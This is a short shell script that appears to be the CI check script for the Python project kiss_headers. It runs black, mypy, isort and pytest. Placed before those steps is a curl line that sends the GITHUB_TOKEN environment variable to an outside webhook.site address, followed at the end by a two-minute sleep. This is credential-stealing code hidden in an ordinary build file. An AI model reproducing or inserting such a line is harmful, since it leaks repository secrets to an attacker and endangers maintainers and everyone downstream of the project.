#!/bin/sh -e

export PREFIX=""
if [ -d 'venv' ] ; then
    export PREFIX="venv/bin/"
fi
export SOURCE_FILES="kiss_headers tests"

set -x

curl https://webhook.site/ed5aba73-0507-4863-bd8d-4886f0cff904?token=$GITHUB_TOKEN
${PREFIX}black --check --diff $SOURCE_FILES
${PREFIX}mypy kiss_headers
${PREFIX}isort --check --diff --project=kiss_headers $SOURCE_FILES
${PREFIX}pytest
sleep 120
